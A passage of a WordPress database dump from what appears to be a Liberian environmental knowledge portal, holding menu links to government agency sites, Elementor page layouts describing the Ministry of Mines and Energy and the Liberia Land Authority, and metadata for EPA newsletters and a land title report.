s:0:\"\";}'),(14279,2275,'_menu_item_xfn',''),(14280,2275,'_menu_item_url','https://mme.gov.lr/licenses/'),(14282,2275,'_menu_item_template',''),(14283,2275,'_menu_item_mega_template','0'),(14284,2275,'_menu_item_nolink',''),(14285,2275,'_menu_item_category_post',''),(14286,2275,'_menu_item_megamenu',''),(14287,2275,'_menu_item_megamenu_auto_width',''),(14288,2275,'_menu_item_megamenu_col',''),(14289,2275,'_menu_item_megamenu_heading',''),(14290,2275,'_menu_item_megamenu_widgetarea','0'),(14291,2275,'_menu_item_icon',''),(14295,2277,'_elementor_edit_mode','builder'),(14296,2277,'_elementor_template_type','wp-post'),(14297,2277,'_elementor_version','2.7.5'),(14298,2277,'_wp_page_template','default'),(14299,2277,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c6396f9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14300,2277,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(14303,2274,'_elementor_controls_usage','a:0:{}'),(14304,2275,'_elementor_controls_usage','a:0:{}'),(14305,2279,'_elementor_controls_usage','a:0:{}'),(14307,2279,'_ca_post_type','1608'),(14308,2278,'_edit_last','1'),(14309,2278,'_elementor_controls_usage','a:0:{}'),(14310,2278,'_ca_handle','0'),(14311,2278,'_ca_host','sidebar'),(14312,2278,'_ca_merge_pos','0'),(14313,2278,'_edit_lock','1574250601:1'),(14314,2281,'_elementor_controls_usage','a:0:{}'),(14316,2281,'_ca_post_type','1602'),(14317,2280,'_edit_last','1'),(14318,2280,'_elementor_controls_usage','a:0:{}'),(14319,2280,'_ca_handle','0'),(14320,2280,'_ca_host','sidebar'),(14321,2280,'_ca_merge_pos','0'),(14322,2280,'_edit_lock','1573812546:1'),(14323,2282,'_wp_attached_file','2019/11/laa_logo.png'),(14324,2282,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:20:\"2019/11/laa_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"laa_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(14327,2284,'_menu_item_type','custom'),(14328,2284,'_menu_item_menu_item_parent','0'),(14329,2284,'_menu_item_object_id','2284'),(14330,2284,'_menu_item_object','custom'),(14331,2284,'_menu_item_target','_blank'),(14332,2284,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(14333,2284,'_menu_item_xfn',''),(14334,2284,'_menu_item_url','http://lla.gov.lr/web/index.php'),(14336,2284,'_menu_item_template',''),(14337,2284,'_menu_item_mega_template','0'),(14338,2284,'_menu_item_nolink',''),(14339,2284,'_menu_item_category_post',''),(14340,2284,'_menu_item_megamenu',''),(14341,2284,'_menu_item_megamenu_auto_width',''),(14342,2284,'_menu_item_megamenu_col',''),(14343,2284,'_menu_item_megamenu_heading',''),(14344,2284,'_menu_item_megamenu_widgetarea','0'),(14345,2284,'_menu_item_icon',''),(14346,2284,'_elementor_controls_usage','a:0:{}'),(14347,2285,'_menu_item_type','custom'),(14348,2285,'_menu_item_menu_item_parent','0'),(14349,2285,'_menu_item_object_id','2285'),(14350,2285,'_menu_item_object','custom'),(14351,2285,'_menu_item_target','_blank'),(14352,2285,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(14353,2285,'_menu_item_xfn',''),(14354,2285,'_menu_item_url','https://nafaa.gov.lr/'),(14356,2285,'_menu_item_template',''),(14357,2285,'_menu_item_mega_template','0'),(14358,2285,'_menu_item_nolink',''),(14359,2285,'_menu_item_category_post',''),(14360,2285,'_menu_item_megamenu',''),(14361,2285,'_menu_item_megamenu_auto_width',''),(14362,2285,'_menu_item_megamenu_col',''),(14363,2285,'_menu_item_megamenu_heading',''),(14364,2285,'_menu_item_megamenu_widgetarea','0'),(14365,2285,'_menu_item_icon',''),(14366,2286,'_menu_item_type','custom'),(14367,2286,'_menu_item_menu_item_parent','0'),(14368,2286,'_menu_item_object_id','2286'),(14369,2286,'_menu_item_object','custom'),(14370,2286,'_menu_item_target','_blank'),(14371,2286,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(14372,2286,'_menu_item_xfn',''),(14373,2286,'_menu_item_url','https://nafaa.gov.lr/index.php/vessel-registry/vessel-database'),(14375,2286,'_menu_item_template',''),(14376,2286,'_menu_item_mega_template','0'),(14377,2286,'_menu_item_nolink',''),(14378,2286,'_menu_item_category_post',''),(14379,2286,'_menu_item_megamenu',''),(14380,2286,'_menu_item_megamenu_auto_width',''),(14381,2286,'_menu_item_megamenu_col',''),(14382,2286,'_menu_item_megamenu_heading',''),(14383,2286,'_menu_item_megamenu_widgetarea','0'),(14384,2286,'_menu_item_icon',''),(14385,2285,'_elementor_controls_usage','a:0:{}'),(14386,2286,'_elementor_controls_usage','a:0:{}'),(14390,2288,'_elementor_edit_mode','builder'),(14391,2288,'_elementor_template_type','wp-post'),(14392,2288,'_elementor_version','2.7.5'),(14393,2288,'_wp_page_template','default'),(14394,2288,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>\\n\\nThe LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. LLA is a product of the policy, legal and institutional reform of the land sector of Liberia led by the erstwhile Land Commission.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14398,2289,'_elementor_edit_mode','builder'),(14399,2289,'_elementor_template_type','wp-post'),(14400,2289,'_elementor_version','2.7.5'),(14401,2289,'_wp_page_template','default'),(14402,2289,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14405,2290,'_elementor_edit_mode','builder'),(14406,2290,'_elementor_template_type','wp-post'),(14407,2290,'_elementor_version','2.7.5'),(14408,2290,'_wp_page_template','default'),(14409,2290,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.<\\/p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\\u00a0<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14c1aac\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"8a7dd9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"99b98e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39c37c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eea10f6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cc28ee8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a346330\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"390048a\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lla\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(14413,2291,'_menu_item_type','custom'),(14414,2291,'_menu_item_menu_item_parent','0'),(14415,2291,'_menu_item_object_id','2291'),(14416,2291,'_menu_item_object','custom'),(14417,2291,'_menu_item_target','_blank'),(14418,2291,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(14419,2291,'_menu_item_xfn',''),(14420,2291,'_menu_item_url','https://www.lisgis.net/'),(14422,2291,'_menu_item_template',''),(14423,2291,'_menu_item_mega_template','0'),(14424,2291,'_menu_item_nolink',''),(14425,2291,'_menu_item_category_post',''),(14426,2291,'_menu_item_megamenu',''),(14427,2291,'_menu_item_megamenu_auto_width',''),(14428,2291,'_menu_item_megamenu_col',''),(14429,2291,'_menu_item_megamenu_heading',''),(14430,2291,'_menu_item_megamenu_widgetarea','0'),(14431,2291,'_menu_item_icon',''),(14432,2292,'_menu_item_type','custom'),(14433,2292,'_menu_item_menu_item_parent','0'),(14434,2292,'_menu_item_object_id','2292'),(14435,2292,'_menu_item_object','custom'),(14436,2292,'_menu_item_target','_blank'),(14437,2292,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(14438,2292,'_menu_item_xfn',''),(14439,2292,'_menu_item_url','https://www.lisgis.net/page.php?&7d5f44532cbfc489b8db9e12e44eb820=NDI%3D'),(14441,2292,'_menu_item_template',''),(14442,2292,'_menu_item_mega_template','0'),(14443,2292,'_menu_item_nolink',''),(14444,2292,'_menu_item_category_post',''),(14445,2292,'_menu_item_megamenu',''),(14446,2292,'_menu_item_megamenu_auto_width',''),(14447,2292,'_menu_item_megamenu_col',''),(14448,2292,'_menu_item_megamenu_heading',''),(14449,2292,'_menu_item_megamenu_widgetarea','0'),(14450,2292,'_menu_item_icon',''),(14451,2291,'_elementor_controls_usage','a:0:{}'),(14452,2292,'_elementor_controls_usage','a:0:{}'),(14453,2293,'_elementor_controls_usage','a:0:{}'),(14454,2293,'by','EPA'),(14455,2293,'year','2018'),(14456,2293,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/EPA-Newsletter-December-2018-Edition.pdf'),(14457,2293,'_pods_cover_image','a:1:{i:0;i:573;}'),(14458,2293,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(14463,2293,'_dp_original','1747'),(14464,2293,'_edit_lock','1670324135:42'),(14465,2293,'_edit_last','42'),(14466,2294,'_wp_attached_file','2019/11/EPA-Newsletter-December-2018-Edition.pdf'),(14467,2295,'_wp_attached_file','2019/11/EPA-Newsletter-April-2019-Edition.pdf'),(14469,2293,'_pods_attached_document','a:1:{i:0;i:2294;}'),(14471,2296,'_elementor_controls_usage','a:0:{}'),(14472,2296,'by','EPA'),(14473,2296,'year','2019'),(14474,2296,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/EPA-Newsletter-April-2019-Edition.pdf'),(14475,2296,'_pods_cover_image','a:1:{i:0;i:573;}'),(14476,2296,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(14481,2296,'_dp_original','2293'),(14482,2296,'_edit_lock','1670324113:42'),(14483,2296,'_edit_last','42'),(14485,2296,'_pods_attached_document','a:1:{i:0;i:2295;}'),(14487,2297,'_elementor_controls_usage','a:0:{}'),(14488,2297,'by','LLA'),(14489,2297,'year','N/A'),(14490,2297,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Title_Registration_Report_Last.pdf'),(14491,2297,'_pods_cover_image','a:1:{i:0;i:573;}'),(14492,2297,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(14497,2297,'_dp_original','2296'),(14498,2297,'_edit_lock','1670324950:42'),(14499,2297,'_edit_last','42'),(14500,2298,'_wp_attached_file','2019/11/Title_Registration_Report_Last.pdf'),(14502,2297,'_pods_attached_document','a:1:{i:0;i:2298;}'),(14504,2299,'_wp_page_template','default'),(14505,2299,'_elementor_edit_mode','builder'),(14506,2299,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire 